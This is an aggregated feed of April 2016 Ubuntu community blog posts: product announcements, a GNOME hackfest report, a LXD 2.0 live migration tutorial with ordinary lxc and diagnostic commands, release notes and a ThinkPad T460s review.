    We’re excited to announce that the most powerful Ubuntu phone, Meizu PRO 5 Ubuntu edition, is available to order here from en.jd.com, retailing at USD$369.99. And for our friends based in Russia, the phone can be ordered here.

The Meizu PRO 5 Ubuntu Edition features superior, high-spec hardware and ships with the latest Ubuntu OTA 10 OS, making the content-centric Scopes experience on this Ubuntu device smoother than ever.

    Here are a few key specs:

    • 5.7inch 1080p screen
    • 21.16 megapixel rear-facing camera
    • 32GB of internal memory

     

    For those of you who have pre-ordered the Meizu PRO 5 Ubuntu Edition, here’s your chance to buy!

    Buy Here

    26 April, 2016 09:55AM

    Ubuntu Insights: Flying mobile base stations are coming to the UK


    EE, the largest mobile operator in the UK and now part of BT, just announced a collaboration with Lime Micro, a leader in the next big phase of open source mobile network technology, and Canonical (Ubuntu) to ensure the UK gets better mobile coverage.

EE is heavily investing in getting to 95% geographical 4G coverage by 2020. But building a big new macro tower isn’t always possible or right. They would like to use existing infrastructure like lighthouses, high buildings, mountains, and so on. Another major problem is coverage for remote areas, which is not economically or technically viable with the current approach. This is why EE is partnering with innovators on cheaper, smaller, more resilient and better solutions.

Lime Micro is about to crowdfund the first app-enabled open source software defined radio, the LimeSDR. Via a 4G app, the LimeSDR will form the basis of a fully fledged base station. Attach this base station to a balloon or a drone and you will be able to cover regions that are difficult to reach otherwise. Embed base stations inside equipment that is installed for other reasons, like vending machines, cash points, smart light poles and digital signage, and the cost of rolling out connectivity will also go down.

EE expects remote communities to participate as well. These communities can have a say in the features they require and even participate in maintaining the network. This could lead communities to work with the operators in new ways and reduce the need for trained technicians to travel long distances when you have the support of local people: if a base station just needs rebooting, it’s not economical (or sensible) to send an engineer 300 miles from Edinburgh out to the islands.

EE will be challenging UK universities to come up with even more innovative and open source ideas on how to connect the unconnected regions and drive down operating costs. Anybody with good ideas can participate. Snappy Ubuntu Core is open source, app-enabled and production-ready. Just get yourself a LimeSDR, download Ubuntu Core and show the world how your app or device can lower the cost of running a network. Covering unconnected regions will bring economic progress, so your work will benefit society. We’d love to see how you will improve the future of wireless networks…

    LimeSDR Crowd Supply video campaign.

    26 April, 2016 09:42AM

    hackergotchi for Tanglu developers

    Tanglu developers

    A GNOME Software Hackfest report

    Two weeks ago was the GNOME Software hackfest in London, and I’ve been there! And I just now found the time to blog about it, but better do it late than never 😉 .

    Arriving in London and finding the Red Hat offices

After being stuck in trains for the weekend, but fortunately arriving at the airport in time, I finally made it to London with quite some delay due to the slow bus transfer from Stansted Airport. After finding the hotel, the next issue was to get food and a place which accepted my credit card, which was surprisingly hard – in defence of London I must say, though, that it was a Sunday, 7 p.m., and my card is somewhat special (in Canada, it managed to crash some card readers, so they needed a hard-reset). While searching for food, I also stumbled by accident upon the Red Hat offices where the hackfest was starting the next day. My hotel, the office and Tower Bridge were really close to each other, which was awesome! The last time I had been to London was in 2008, and only for a day, so being that close to the city center was great. The hackfest didn’t leave any time to visit the city much, but by being close to the center, one could hardly avoid the “London experience” 😉 .

    Cool people working on great stuff

That’s basically the summary for the hackfest 😉 . It was awesome to meet with Richard Hughes again, since we hadn’t seen each other in person since 2011, but have worked on lots of stuff together. This was especially important, since we managed to solve quite some disagreements we had over stuff – Richard even almost managed to make me give in to adding <kudos/> to the AppStream spec, something which I was pretty against supporting (it didn’t make it yet, but I am no longer against the idea of having that – the remaining issues are solvable).

    Meeting Iain Lane again (after FOSDEM) was also very nice, and also seeing other people I’ve only worked with over IRC or bug reports (e.g. William, Kalev, …) was great. Also lots of “new” people were there, like guys from Endless, who build their low-budget computer for developing/emerging countries on top of GNOME and Linux technologies. It’s pretty cool stuff they do, you should check out their website! (they also build their distribution on top of Debian, which is even more awesome, and something I didn’t know before (because many Endless people I met before were associated with GNOME or Fedora, I kind of implicitly assumed the system was based on Fedora 😛 )).

The incarnation of GNOME Software used by Endless looks pretty different from what the normal GNOME user sees, since it’s adjusted for a different audience and input method. But it looks great, and is a good example of how versatile GS already is! And for upstream GNOME, we’ve seen some pretty great mockups done by Endless too – I hope those will make it into production somehow.

Ironically, a “snapstore” was close to the office ;-)

    XdgApp and sandboxing of apps was also a big topic, aside from Ubuntu and Endless integration. Fortunately, Alexander Larsson was also there to answer all the sandboxing and XdgApp-questions.

I used the time to follow up on a conversation with Alexander we started at FOSDEM this year, about the Limba vs. XdgApp bundling issue. While we are in-line on the sandboxing approach, the way software is distributed is implemented differently in Limba and XdgApp, and it is bad to have too many bundling systems around (it doesn’t make for a good story where we can just tell developers “ship as this bundling format, and it will be supported everywhere”). Talking with Alex about this was very nice, and I think there is a way out of the too-many-solutions dilemma, at least for Limba and XdgApp – I will blog about that separately soon.

    On the Ubuntu side, a lot of bugs and issues were squashed and changes upstreamed to GNOME, and people were generally doing their best to reduce Richard’s bus-factor on the project a little 😉 .

    I mainly worked on AppStream issues, finishing up the last pieces of appstream-generator and running it against some sample package sets (and later that week against the whole Debian archive). I also started to implement support for showing AppStream issues in the Debian PTS (this work is not finished yet). I also managed to solve a few bugs in the old DEP-11 generator and prepare another release for Ubuntu.

    We also enjoyed some good Japanese food, and some incredibly great, but also suddenly very expensive Indian food (but that’s a different story 😉 ).

    The most important thing for me though was to get together with people actually using AppStream metadata in software centers and also more specialized places. This yielded some useful findings, e.g. that localized screenshots are not something weird, but actually a wanted feature of Endless for their curated AppStore. So localized screenshots will be part of the next AppStream spec. Also, there seems to be a general need to ship curation information for software centers somehow (which apps are featured? how are they styled? added special banners for some featured apps, “app of the day” features, etc.). This problem hasn’t been solved, since it’s highly implementation-specific, and AppStream should be distro-agnostic. But it is something we might be able to address in a generic way sooner or later (I need to talk to people at KDE and Elementary about it).

    In summary…

    It was a great event! Going to conferences and hackfests always makes me feel like it moves projects leaps ahead, even if you do little coding. Sorting out issues together with people you see in person (rather than communicating with them via text messages or video chat), is IMHO always the most productive way to move forward (yeah, unless you do this every week, but I think you get my point 😀 ).

    For me, being the only (and youngest ^^) developer at the hackfest who was not employed by any company in the FLOSS business, the hackfest was also motivating to continue to invest spare time into working on these projects.

    So, the only thing left to do is a huge shout out of “THANK YOU” to the Ubuntu Community Fund – and therefore the Ubuntu community – for sponsoring me! You rock! Also huge thanks to Canonical for organizing the sponsoring really quickly, so I didn’t get into trouble with paying my flights.

Laney and attente on the Millennium Bridge after we walked the distance between Red Hat and Canonical’s offices.

    To worried KDE people: No, I didn’t leave the blue side – I just generally work on cross-desktop stuff, and would like all desktops to work as well as possible 😉

    26 April, 2016 07:50AM by Matthias

    hackergotchi for Ubuntu developers

    Ubuntu developers

    Dustin Kirkland: Keep OpenStack Weird



    The OpenStack Summit in Austin has already kicked off, and this time, Ubuntu is the official lanyard sponsor at OpenStack Summit Austin.

    The sponsorship contract for the OpenStack Summit explicitly states that only the official lanyard sponsor may distribute lanyards. Whilst we understand the reason that clause is there, we don't agree with it. It just doesn't seem very "open" nor in the spirit of OpenStack.

    Freedom of choice is an important aspect of all open source communities and one that we certainly champion, so attendees should be free to wear whatever branded lanyard they want with pride at the OpenStack Summit in Austin and we at Canonical will celebrate it.  My hometown here, Austin, prides itself on diversity, where we like to Keep Austin Weird!


    So please -- partners, customers, competitors, other OpenStack Sponsors: if you want to distribute your own lanyards then please go ahead safe in the knowledge that Canonical will not complain to the conference organizers.  Let's Keep OpenStack (a little bit) Weird, too!



    See you there!
    :-Dustin

    26 April, 2016 04:39AM by Dustin Kirkland (noreply@blogger.com)

    April 25, 2016

    hackergotchi for Ubuntu

    Ubuntu

    Ubuntu Weekly Newsletter Issue 463

    25 April, 2016 11:40PM by lyz

    hackergotchi for Ubuntu developers

    Ubuntu developers

Ubuntu Insights: Making Deep Learning accessible on OpenStack

This week at the OpenStack Developer Summit we are excited to showcase how Canonical, together with IBM, Mesosphere, Skymind and Data Fellas, is working to make the opportunities of deep learning easier for everyone to access.

Deep learning is a completely new way of building applications. These applications, built around neural network models, rapidly become self-learning and self-evolving. Make no mistake: this is, once again, a paradigm shift for our industry. It opens up a new world of very exciting possibilities.

Deep learning allows complex, big software to skip many of the traditional design and development processes by having the software itself evolve. This is important, since we quickly encounter significant constraints when building and deploying big software and big data projects. These constraints include not only the complexity of the operations involved but also the very stark realisation that there are not enough people, with the required skills and domain expertise, to meet industry demand. Unless we find a smarter way of addressing these constraints, we will severely limit the speed at which our industry can liberate the opportunities of big software, and of deep learning in particular.

At the heart of deep learning is the concept of neural networks that monitor a specific environment, searching for significant events and patterns and learning how best to adapt to them. Of course, a key part of this process is the period in which the artificial intelligence is in training. Once initiated, the model continues to be self-improving as more data is analyzed over time.

Across all industries we see meaningful applications of deep learning emerging. In healthcare, a recent challenge was launched to improve the process and outcomes around cardiac diagnosis. In personal concierge services and in retail, neural networks are being married to image recognition to drive recommendation engines. In natural language processing, deep learning is being used not only to automate a higher level of interaction with customers but also to understand, through sentiment analysis, when the experience is degrading and when a warm body needs to intervene. There are of course many projects and many stories emerging in deep learning, and these only scratch the surface of what is possible. This raises the question: "Why are we not seeing an explosion of new, real-world experiences constructed around deep learning?"

    The answer is that, as well as the constraints that were previously mentioned, there are also additional things to consider for anyone involved in this space. For instance, if you have a small set of data it is easy to set up a small project cheaply in a few days. When you start to tackle big data sets and to operate at scale your ability to do so quickly becomes significantly more challenging and your options become more limited.

    Canonical and Ubuntu underpin the world of scale-out architectures and automation around big software projects. We wake up every day thinking about how we can help simplify, codify, automate and unleash the potential of technology such as deep learning. That is why we have been working with partners such as IBM Power Systems, Mesosphere, Skymind and Data Fellas.

    • IBM Power Systems accelerates the processing of deep learning applications, using Coherent Accelerator Processor Interface (CAPI) or GPU attach to increase throughput. This performance will improve even further when NVLink becomes available.
    • Mesosphere supplies the mechanism to run distributed systems and containers as simple as using a single computer. It makes it easy to deploy and operate complex datacenter services like Spark.
• Skymind is the commercial support arm of the open-source framework DeepLearning4j (the Java/Scala deep learning framework), bringing the power of deep learning to the enterprise on Spark and Hadoop.
• Data Fellas offers an agile data science toolkit that puts the full power of distributed machine learning into the hands of the new generation of data scientists.

    The first thing that we created is a model with Juju, Canonical’s Application Modelling Framework, that automates the process for building a complete, classic, deep learning stack. This includes everything from bare metal to essential interfaces. The model includes:

    • A data pipeline to push data into Hadoop HDFS.
• An evolving data computation stack made of Spark and Hadoop.
• A computing framework, based on Mesos, for scheduling Spark jobs.
• An interactive notebook to create training pipelines and build neural networks.

The system, modelled by Juju, is deployed on IBM Power GPU-enabled machines for performance and operated by Juju in LXD containers.

    We can provide guidance on how you can deploy your own machine/deep learning stack at scale and do your own data analysis. We believe that this early work significantly increases the ability for everyone to get their hands on classic big data infrastructure in just minutes.
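
To give a rough feel for what driving such a model looks like, here is a purely illustrative sketch using the Juju command line; the charm and service names below are placeholders rather than the exact charms used in this demo:

# Deploy the building blocks of the stack (charm names are placeholders)
juju deploy apache-hadoop-namenode hdfs-master
juju deploy apache-spark spark
juju deploy my-notebook notebook
# Relate the pieces so Spark jobs can reach HDFS and the notebook can drive Spark
juju add-relation spark hdfs-master
juju add-relation notebook spark
# Watch the model converge
juju status

The value of modelling the stack this way is that the same description can be redeployed on bare metal, in LXD containers or on a public cloud without rewriting the deployment logic.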

There are many use cases for deep learning and it’s hard to pick only one! However, Canonical is engaged heavily in major OpenStack projects in all sectors including telco, retail, media, finance and others. Our initial projects have therefore gravitated towards how we make operations around OpenStack more performant.

    OpenStack Logs

Canonical runs the OpenStack Interoperability Lab (OIL). With over 35 vendors participating and over 170 configuration combinations, Canonical typically builds over 3,500 OpenStack clouds every month to complete interoperability testing.

    This generates over 10GB of logs on OpenStack interoperability and performance every week. We use these log results to train the deep learning model to predict when an OpenStack cloud is going to fail. This produced two outcomes.

    First, even at an early stage, this showed an improvement over traditional monitoring systems that only assess the status based on how OpenStack engineers and operators have configured the monitoring of the solution. Intelligent agents were able to trigger alarms based on “feeling” the network, rather than on straight values and probabilities. This is a bit like a spam robot reducing the amount of work of support teams by notifying them of the threat level.

    Secondly, over time, as the cloud grows, losing a node becomes less and less manageable. These agents are able to make completely automated decisions such as “migrate all containers off this node” or “restart these services asap”

    The beauty of this is that it doesn’t depend on OpenStack itself. The same network will be trainable on any form of applications, creating a new breed of monitoring and metrology systems, combining the power of logs with metrics. Ultimately this makes OpenStack more reliable and performant.

    Network Intrusion

We also applied our reference architecture to anomaly detection using NIDS (network intrusion detection system) data. This is a classic problem for neural networks. Models are trained to monitor and identify unauthorized, illicit and anomalous network behavior, notify network administrators and take autonomous actions to preserve the network’s integrity.

    Several datasets were used for this initial proof of concept and the models used included:

    • MLP | Feedforward (currently used for streaming)
    • RNN
    • AutoEncoder
    • MLP simulated AutoEncoder

If you are at the OpenStack Developer Summit, we will be demonstrating this all week at the Ubuntu/Canonical booth, A20. Please drop by if you would like to discuss and see our work in this area.

If you are not attending the OpenStack Summit and would like to start a conversation with Canonical to help us identify the applications and workloads that are most meaningful to you, please get in touch with Samuel Cozannet. Or if you are keen to partner with us in this work, please get in touch.

    25 April, 2016 08:49PM

    Stéphane Graber: LXD 2.0: Live migration [9/12]

    This is the ninth blog post in this series about LXD 2.0.

    LXD logo

    Introduction

One of the very exciting features of LXD 2.0, albeit an experimental one, is the support for container checkpoint and restore.

Simply put, checkpoint/restore means that the running container state can be serialized down to disk and then restored, either on the same host (as a stateful snapshot of the container) or on another host, which equates to live migration.

    Requirements

    To have access to container live migration and stateful snapshots, you need the following:

    • A very recent Linux kernel, 4.4 or higher.
    • CRIU 2.0, possibly with some cherry-picked commits depending on your exact kernel configuration.
    • Run LXD directly on the host. It’s not possible to use those features with container nesting.
    • For migration, the target machine must at least implement the instruction set of the source, the target kernel must at least offer the same syscalls as the source and any kernel filesystem which was mounted on the source must also be mountable on the target.

    All the needed dependencies are provided by Ubuntu 16.04 LTS, in which case, all you need to do is install CRIU itself:

    apt install criu
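
If you want to double-check a machine against the requirements above before trying anything stateful, a quick sanity check could look something like this (the exact output of criu check depends on your kernel configuration):

uname -r          # should report 4.4 or newer
criu --version    # should report 2.0 or newer
sudo criu check   # asks CRIU to verify that the kernel features it needs are present

If criu check complains about missing features, stateful snapshots and migration are unlikely to work until the kernel side is sorted out.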

    Using the thing

    Stateful snapshots

    A normal container snapshot looks like:

    stgraber@dakara:~$ lxc snapshot c1 first
    stgraber@dakara:~$ lxc info c1 | grep first
     first (taken at 2016/04/25 19:35 UTC) (stateless)

    A stateful snapshot instead looks like:

    stgraber@dakara:~$ lxc snapshot c1 second --stateful
    stgraber@dakara:~$ lxc info c1 | grep second
     second (taken at 2016/04/25 19:36 UTC) (stateful)

    This means that all the container runtime state was serialized to disk and included as part of the snapshot. Restoring one such snapshot is done as you would a stateless one:

    stgraber@dakara:~$ lxc restore c1 second
    stgraber@dakara:~$

    Stateful stop/start

    Say you want to reboot your server for a kernel update or similar maintenance. Rather than have to wait for all the containers to start from scratch after reboot, you can do:

    stgraber@dakara:~$ lxc stop c1 --stateful

    The container state will be written to disk and then picked up the next time you start it.

    You can even look at what the state looks like:

    root@dakara:~# tree /var/lib/lxd/containers/c1/rootfs/state/
    /var/lib/lxd/containers/c1/rootfs/state/
    ├── cgroup.img
    ├── core-101.img
    ├── core-102.img
    ├── core-107.img
    ├── core-108.img
    ├── core-109.img
    ├── core-113.img
    ├── core-114.img
    ├── core-122.img
    ├── core-125.img
    ├── core-126.img
    ├── core-127.img
    ├── core-183.img
    ├── core-1.img
    ├── core-245.img
    ├── core-246.img
    ├── core-50.img
    ├── core-52.img
    ├── core-95.img
    ├── core-96.img
    ├── core-97.img
    ├── core-98.img
    ├── dump.log
    ├── eventfd.img
    ├── eventpoll.img
    ├── fdinfo-10.img
    ├── fdinfo-11.img
    ├── fdinfo-12.img
    ├── fdinfo-13.img
    ├── fdinfo-14.img
    ├── fdinfo-2.img
    ├── fdinfo-3.img
    ├── fdinfo-4.img
    ├── fdinfo-5.img
    ├── fdinfo-6.img
    ├── fdinfo-7.img
    ├── fdinfo-8.img
    ├── fdinfo-9.img
    ├── fifo-data.img
    ├── fifo.img
    ├── filelocks.img
    ├── fs-101.img
    ├── fs-113.img
    ├── fs-122.img
    ├── fs-183.img
    ├── fs-1.img
    ├── fs-245.img
    ├── fs-246.img
    ├── fs-50.img
    ├── fs-52.img
    ├── fs-95.img
    ├── fs-96.img
    ├── fs-97.img
    ├── fs-98.img
    ├── ids-101.img
    ├── ids-113.img
    ├── ids-122.img
    ├── ids-183.img
    ├── ids-1.img
    ├── ids-245.img
    ├── ids-246.img
    ├── ids-50.img
    ├── ids-52.img
    ├── ids-95.img
    ├── ids-96.img
    ├── ids-97.img
    ├── ids-98.img
    ├── ifaddr-9.img
    ├── inetsk.img
    ├── inotify.img
    ├── inventory.img
    ├── ip6tables-9.img
    ├── ipcns-var-10.img
    ├── iptables-9.img
    ├── mm-101.img
    ├── mm-113.img
    ├── mm-122.img
    ├── mm-183.img
    ├── mm-1.img
    ├── mm-245.img
    ├── mm-246.img
    ├── mm-50.img
    ├── mm-52.img
    ├── mm-95.img
    ├── mm-96.img
    ├── mm-97.img
    ├── mm-98.img
    ├── mountpoints-12.img
    ├── netdev-9.img
    ├── netlinksk.img
    ├── netns-9.img
    ├── netns-ct-9.img
    ├── netns-exp-9.img
    ├── packetsk.img
    ├── pagemap-101.img
    ├── pagemap-113.img
    ├── pagemap-122.img
    ├── pagemap-183.img
    ├── pagemap-1.img
    ├── pagemap-245.img
    ├── pagemap-246.img
    ├── pagemap-50.img
    ├── pagemap-52.img
    ├── pagemap-95.img
    ├── pagemap-96.img
    ├── pagemap-97.img
    ├── pagemap-98.img
    ├── pages-10.img
    ├── pages-11.img
    ├── pages-12.img
    ├── pages-13.img
    ├── pages-1.img
    ├── pages-2.img
    ├── pages-3.img
    ├── pages-4.img
    ├── pages-5.img
    ├── pages-6.img
    ├── pages-7.img
    ├── pages-8.img
    ├── pages-9.img
    ├── pipes-data.img
    ├── pipes.img
    ├── pstree.img
    ├── reg-files.img
    ├── remap-fpath.img
    ├── route6-9.img
    ├── route-9.img
    ├── rule-9.img
    ├── seccomp.img
    ├── sigacts-101.img
    ├── sigacts-113.img
    ├── sigacts-122.img
    ├── sigacts-183.img
    ├── sigacts-1.img
    ├── sigacts-245.img
    ├── sigacts-246.img
    ├── sigacts-50.img
    ├── sigacts-52.img
    ├── sigacts-95.img
    ├── sigacts-96.img
    ├── sigacts-97.img
    ├── sigacts-98.img
    ├── signalfd.img
    ├── stats-dump
    ├── timerfd.img
    ├── tmpfs-dev-104.tar.gz.img
    ├── tmpfs-dev-109.tar.gz.img
    ├── tmpfs-dev-110.tar.gz.img
    ├── tmpfs-dev-112.tar.gz.img
    ├── tmpfs-dev-114.tar.gz.img
    ├── tty.info
    ├── unixsk.img
    ├── userns-13.img
    └── utsns-11.img
    
    0 directories, 154 files

    Restoring the container can be done with a simple:

    stgraber@dakara:~$ lxc start c1

    Live migration

    Live migration is basically the same as the stateful stop/start above, except that the container directory and configuration happens to be moved to another machine too.

    stgraber@dakara:~$ lxc list c1
    +------+---------+-----------------------+----------------------------------------------+------------+-----------+
    | NAME |  STATE  |          IPV4         |                     IPV6                     |    TYPE    | SNAPSHOTS |
    +------+---------+-----------------------+----------------------------------------------+------------+-----------+
    | c1   | RUNNING | 10.178.150.197 (eth0) | 2001:470:b368:4242:216:3eff:fe19:27b0 (eth0) | PERSISTENT | 2         |
    +------+---------+-----------------------+----------------------------------------------+------------+-----------+
    
    stgraber@dakara:~$ lxc list s-tollana:
    +------+-------+------+------+------+-----------+
    | NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS |
    +------+-------+------+------+------+-----------+
    
    stgraber@dakara:~$ lxc move c1 s-tollana:
    
    stgraber@dakara:~$ lxc list c1
    +------+-------+------+------+------+-----------+
    | NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS |
    +------+-------+------+------+------+-----------+
    
    stgraber@dakara:~$ lxc list s-tollana:
    +------+---------+-----------------------+----------------------------------------------+------------+-----------+
    | NAME |  STATE  |          IPV4         |                     IPV6                     |    TYPE    | SNAPSHOTS |
    +------+---------+-----------------------+----------------------------------------------+------------+-----------+
    | c1   | RUNNING | 10.178.150.197 (eth0) | 2001:470:b368:4242:216:3eff:fe19:27b0 (eth0) | PERSISTENT | 2         |
    +------+---------+-----------------------+----------------------------------------------+------------+-----------+

    Limitations

As I said before, checkpoint/restore of containers is still pretty new and we’re still very much working on this feature, fixing issues as we are made aware of them. We do need more people trying this feature and sending us feedback; I would however not recommend using this in production just yet.

    The current list of issues we’re tracking is available on Launchpad.

    We expect a basic Ubuntu container with a few services to work properly with CRIU in Ubuntu 16.04. However more complex containers, using device passthrough, complex network services or special storage configurations are likely to fail.

    Whenever possible, CRIU will fail at dump time, rather than at restore time. In such cases, the source container will keep running, the snapshot or migration will simply fail and a log file will be generated for debugging.

    In rare cases, CRIU fails to restore the container, in which case the source container will still be around but will be stopped and will have to be manually restarted.

    Sending bug reports

    We’re tracking bugs related to checkpoint/restore against the CRIU Ubuntu package on Launchpad. Most of the work to fix those bugs will then happen upstream either on CRIU itself or the Linux kernel, but it’s easier for us to track things this way.

    To file a new bug report, head here.

    Please make sure to include:

    • The command you ran and the error message as displayed to you
    • Output of “lxc info” (*)
    • Output of “lxc info <container name>”
• Output of “lxc config show --expanded <container name>”
    • Output of “dmesg” (*)
    • Output of “/proc/self/mountinfo” (*)
• Output of “lxc exec <container name> -- cat /proc/self/mountinfo”
    • Output of “uname -a” (*)
    • The content of /var/log/lxd.log (*)
    • The content of /etc/default/lxd-bridge (*)
    • A tarball of /var/log/lxd/<container name>/ (*)

    If reporting a migration bug as opposed to a stateful snapshot or stateful stop bug, please include the data for both the source and target for any of the above which has been marked with a (*).
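
If you want to gather most of that in one go, a small shell snippet along these lines can help; it simply wraps the commands listed above (adjust the container name, run it as root or with sudo so the log files are readable, and note that the paths are the Ubuntu 16.04 defaults):

name=c1            # the affected container
out=lxd-bugreport
mkdir -p "$out"
lxc info > "$out/lxc-info.txt"
lxc info "$name" > "$out/lxc-info-container.txt"
lxc config show --expanded "$name" > "$out/lxc-config.txt"
dmesg > "$out/dmesg.txt"
cat /proc/self/mountinfo > "$out/mountinfo-host.txt"
lxc exec "$name" -- cat /proc/self/mountinfo > "$out/mountinfo-container.txt"
uname -a > "$out/uname.txt"
cp /var/log/lxd.log /etc/default/lxd-bridge "$out/"
tar czf "$out/container-logs.tar.gz" /var/log/lxd/"$name"/

For a migration bug, run it on both the source and the target machine so you have the items marked with a (*) from each side.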

    Extra information

    The CRIU website can be found at: https://criu.org

    The main LXD website is at: https://linuxcontainers.org/lxd
    Development happens on Github at: https://github.com/lxc/lxd
    Mailing-list support happens on: https://lists.linuxcontainers.org
    IRC support happens in: #lxcontainers on irc.freenode.net
    Try LXD online: https://linuxcontainers.org/lxd/try-it

    25 April, 2016 08:25PM

    LMDE

    Sucuri becomes Linux Mint’s 3rd biggest sponsor

     

    I’m happy to announce that Sucuri is now Linux Mint’s 3rd biggest sponsor.

    Sucuri is a security company, specialized in incident response, monitoring and protection for web sites. With thousands of clients, their cloud-based firewall handles more than 16 billion page views every single month, while their incident response team can remediate hundreds of sites on a single day.

Working with Sucuri has been a great experience for us. Our project uses many servers spread across the world. Thanks to Sucuri’s expertise, their help and their products, we were able to quickly recover from the attacks launched against our distribution, and to set up malware monitoring and improved automated backups. Their firewall protects access to our servers and uses cache and compression techniques to speed up traffic on our web sites. Sucuri also helped us with the adoption of HTTPS and the hardening of our servers. We’re able to quickly get in touch and chat with them when needed. That proximity and relationship with our partners is very important to our project and their expertise in security is really appreciated.

    We’re proud to welcome Sucuri as our new sponsor and very grateful for the help they’re giving us.

    25 April, 2016 06:49PM by Clem

    hackergotchi for Ubuntu developers

    Ubuntu developers

    Ubuntu Insights: A DIY guide to the Aquaris M10 Ubuntu Edition tablet

With the Aquaris M10 Ubuntu Edition tablet making its way into the hands of many, and questions being asked about how the tablet can take on its various modes, we thought we’d create a DIY one-pager that shows you how versatile the tablet truly is! Check out the guide below to follow the steps…

    Download > M10 ‘DIY Guide’


    Learn more about the Aquaris M10 Ubuntu Edition tablet.

    10 cool M10 accessories to check out.

    25 April, 2016 03:20PM

    Ubuntu GNOME: Ubuntu GNOME 16.04 LTS is here


The brave, fearless volunteers behind Ubuntu GNOME are very happy to announce
the official release of Ubuntu GNOME 16.04 LTS, supported for 3 years. This is
our 2nd official Long Term Support (LTS) version.

    Before you upgrade or download, kindly make sure to read:
    https://wiki.ubuntu.com/XenialXerus/ReleaseNotes/UbuntuGNOME

    You may want to download from:
    http://cdimage.ubuntu.com/ubuntu-gnome/releases/16.04/release/

We highly suggest downloading via torrent.

    Ubuntu 16.04 LTS release announcement:
    https://lists.ubuntu.com/archives/ubuntu-release/2016-April/003720.html

Special thanks to each and every one who made it happen. You’re the best, no
doubt about it.

    Yet another achievement 😀

    If you have any questions, please don’t hesitate to contact us.

    Thank you for choosing and using Ubuntu GNOME!

    Ali Jawad
    Ubuntu GNOME Release and Community Manager

    25 April, 2016 12:58PM

    Stuart Langridge: The wisest words spoken

    If all the world’s a stage
    Then light my way
    Because out, out your brief candle is not
    Four centuries past, yet I still cannot grasp
    That undiscovered country that makes words immortal
    If the good that men do is interred with their bones
    Then this precious stone is a beauty too rich
    Methinks it’s a jewel in the ear of us all
    As the wisest words spoken are spoken by fools

    from This Gives Life To Thee, performed by Akala, Nitin Sawhney, and Dane Hurst, as part of the BBC’s Shakespeare Live! From the RSC, 23rd April 2016.

    25 April, 2016 08:09AM

    hackergotchi for VyOS

    VyOS

    Would you participate in a VyOS conference if it existed?

    Hi everyone,

Please note: this is not a call for papers or anything like that. This is absolutely theoretical, no specific plans whatsoever have been made, and we clearly have more important things to worry about, but we want to gauge interest to find out if there is a reason to ever think about it or not.

If we were to have a VyOS conference, would you participate? What would be the preferred location? How far would you agree to travel to attend it? What would you like to see there? What would you like to speak about, or listen to?


    25 April, 2016 06:30AM by Yuriy Andamasov

    hackergotchi for Ubuntu developers

    Ubuntu developers

    Sam Hewitt: Lenovo ThinkPad T460s Review

To replace my aging and broken ThinkPad E Series (the cheaper and plastic-er ThinkPad), getting the latest and greatest in ThinkPads was decidedly the best way to go. After much deliberation, the T460s was my choice. So after a couple of weeks with it, here is my review.

    It's definitely a ThinkPad

The T460s, like all ThinkPads, is an understated, matte black box with minimal branding. To give this box some toughness, Lenovo uses a combination of magnesium alloy for the chassis plus carbon-fibre-reinforced plastic surrounding the display for the lid, all of which feels very nice. The T460s is also much thinner and lighter than most of the other laptops in Lenovo's ThinkPad lineup (save the X1 series), at 1.88 cm (0.74 in) tall and just 1.36 kg (3.0 lb).

    Performance & Hardware

    While this model is configured with a dual-core Intel Skylake Core i5 chip at 2.80 GHz, it is configurable up to a Core i7, also dual-core, at 3.40 GHz, which isn't spectacular but is comparable with many other laptops in this class.

    Fortunately, the magnesium case isn't a unibody design and the innards are easily accessible by unscrewing a few Phillips screws in the base. Memory-wise, the T460s comes with either 4GB or 8GB integrated with the motherboard, but there is a single slot for up to 16GB of additional DDR4 RAM which allows for some upgradeability. The same goes for the removable solid-state (and only solid-state) drive.

    All this makes the T460s very quick to boot, but not necessarily a powerhouse. For me, it has enough performance for most tasks –it handles my graphics workload without a hitch.

    Battery Life, Heat & Noise

The thinness of the T460s comes with a trade-off: you lose the swappable battery you find on most ThinkPads, which is a fair trade in my view. Instead the T460s has two 3-cell internal batteries (23Wh and 26Wh), which give it a purported maximum of 10.5 hours of battery life; however, under pretty intensive use I've gotten more in the range of 7-8 hours.

    While it's plugged-in and charging the underside of the T460s does get a little warm, but not significantly, which is likely a side effect of the laptop being thin and it using its metal enclosure to passively disperse heat.

    Speaking of heat: fans. It has one, but not so you'd notice. Most of the time the T460s is dead silent thanks to its SSD and passive cooling, even on the rare occasion when the fan is running, it's so quiet you'd never know.

    Ports & Connectivity

Keeping with ThinkPads' usefulness, Lenovo has crammed a tonne of ports into the sides of the T460s. The left hosts a single USB 3.0 port, a headphone jack and an SD card slot (the AC adapter plugs into this side as well). On the right side you'll find 2 more USB 3.0 ports, one of which is powered, HDMI out, a Mini DisplayPort, Gigabit Ethernet, a Kensington lock slot, plus a SIM card & smart card reader slot (regardless of whether you have either of those options).

    You also get the usual assortment of the latest connectivity hardware in this Thinkpad: Intel 802.11ac wireless, Bluetooth 4.1 and optionally a WWAN module, with all the latest wireless standards.

    Display

    The display is a 14" IPS non-touch display at 1920x1080, but you can upgrade to a 2K (2560x1440) display with or without multi-touch.

Even at the lowest configuration (1080p) the display is great: it's sufficiently bright and crisp, with 250 nits and a 700:1 contrast ratio. Nearly all sane viewing angles are covered, as well as a few insane ones, since the display can open to a full 180° (why one would do this is beyond me) and the hinge it's on is very rigid.

    Keyboard & Input

    The chiclet-style keyboard is an excellent typing experience, as you would expect from a ThinkPad, with ample travel on each key and a satisfying click. There are a few nice details like LED indicators for the FnLock and CapsLock keys as well as the Mute key, and I've opted to have the entire keyboard LED backlit as well. My only keyboard grievance is the Windows-specific keys in the function row, instead of more generic items –alas, this is a symptom of the Microsoft monopoly.

Now, the touchpad in this ThinkPad isn't best-in-class, but it's sufficiently large and sports multitouch support (software permitting). Many ThinkPad users, like myself, go in for the requisite TrackPoint; if you like it, then great, and if not, it's never in the way. If anything, the additional buttons above the trackpad are still useful regardless of whether you use the nub. And in my view the little bit of red among all the black is a nice aesthetic touch.

    Aside from the keyboard, nub and touchpad, the only other things on this side of the T460s are the power button and a fingerprint reader (which I haven't used, more on that later).

    Camera & Audio

    The 720p camera is a pretty standard webcam, which is paired with a dual-array microphone. The speakers, however, leave a bit to be desired. They're pretty much devoid of bass and at higher volumes things start to sound tinny. Also, being on the bottom of the laptop they will be slightly muffled if you happen to have the T460s on your lap or another soft surface. So stick to hard surfaces for the best sound or pack some headphones.

